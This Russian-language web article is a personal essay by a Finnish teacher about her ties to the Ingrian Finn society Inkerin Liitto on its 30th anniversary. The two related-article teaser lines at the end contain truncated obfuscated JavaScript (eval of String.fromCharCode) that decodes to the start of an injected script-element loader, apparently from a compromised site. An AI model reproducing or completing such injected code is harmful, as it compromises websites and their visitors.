Алла Садовникова об обществе ингерманландских финнов Инкерин Лиитто

Когда в середине сентября я получила приглашение на празднование 30-летия создания, моё самоуважение поднялось ещё на один уровень вверх. Я — человек, который не стоял у истоков создания организации, не разделивший ни в своей судьбе, ни в судьбе своих предков трагедии ингерманландцев, начальным словом «arvoisa- уважаемая» приглашена подвести некий промежуточный итог работы общества и поговорить о планах на будущее.

Несомненно, моё участие в юбилейном празднике организации не было случайным. Уже более двадцати трёх лет я преподаю финский язык на курсах, организованных самим обществом или при его содействии. История того, как я, будучи выпускницей Ленинградского инженерно-строительного института, вдруг стала преподавателем финского языка, заслуживает отдельного рассказа, но сейчас не об этом.

Я верю в судьбу отчасти, и в моём случае эта судьба проявилась именно в профессиональном плане. В школе мои учителя советовали мне пойти по их стопам, мотивируя  тем, что я умею научить другого тому, что знаю сама.  Учитель иностранного языка хвалила меня за некие филологические способности. К этим обстоятельствам добавлялся тот факт, что я с детства живу в Стрельне. Моими друзьями и одноклассниками были дети из ингерманландских семей, и финский язык я слышала с детства. Тогда в Стрельне это не было редкостью. В моей школе и в моём классе учились многие с финскими и немецкими фамилиями, и ни для кого это не было препятствием в дружбе и общении.

Мелодика финского языка была мне приятна. Я приставала с расспросами к друзьям детства, почему они не говорят по-фински. Их ответ: «Наши родители не хотят, чтобы мы говорили по-фински» меня очень удивлял. Тогда я не знала ни истории ингерманландских финнов, ни трагедии, которую этому коренному народу северо-запада России пришлось пережить.

Кроме того, в хронике жизни моих русских родственников по папиной линии, мне не был понятен тот факт, как они попали из Рязанской области на приграничную с Финляндией территорию, в город Каменногорск Ленинградской области. Я часто бывала там с папой, бродила по окрестностям, постоянно находя следы пребывания здесь людей с явно не русской ментальностью. Это были фундаменты, а иногда и стены добротно построенных домов и хозяйственных построек, ещё плодоносящие яблони и кусты смородины, остатки колодцев и куски вымощенных камнем лесных дорог.

Всё говорило о том, что здесь жили умелые и трудолюбивые люди. Намного позже я выяснила, что мои предки были перемещены насильно на бывшую территорию Финляндии в итоге известных всем исторических событий. Они в этом не виноваты.

Было ещё много других неожиданных фактов в моей биографии, намекающих на то, что финский язык нравится мне неспроста. Однажды сработал закон диалектики – количество переросло в качество, и вместо инженера, мало заинтересованного своей профессией, появился учитель финского языка, то есть я – Алла Садовникова.  Я благодарна судьбе за то, что всё так случилось. Я благодарна обществу Инкерин Лиитто за то, что когда-то меня сначала пригласили преподавать финский язык, а потом «по совокупности заслуг» приняли в ряды общества ИЛ.

За годы преподавания языка передо мной, как в документальном фильме, прошли судьбы многих ингерманландцев, и мне стали известны истории их семей и трагедии судеб. Я уважаю ингерманландских финнов за их жизнестойкость и желание сохранить свои национальные черты и традиции.

Я желаю всем активистам ИЛ здоровья и успеха в осуществлении планов, новых проектов и новых активных участников движения.

Возможно, Вам также будут интересны статьи:

О фолк-группе Talomerkit eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, ...
«Дибуны — Графская — Песочный... Можно приобрести в офисе "Инкерин Лиитто". Издательство: Гйоль ISBN: 5904790042 Год: 2011 Настоящая книга посвящена историческому прошлому окрес...
Презентация новых «Культурных столиц финно-уг... eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, ...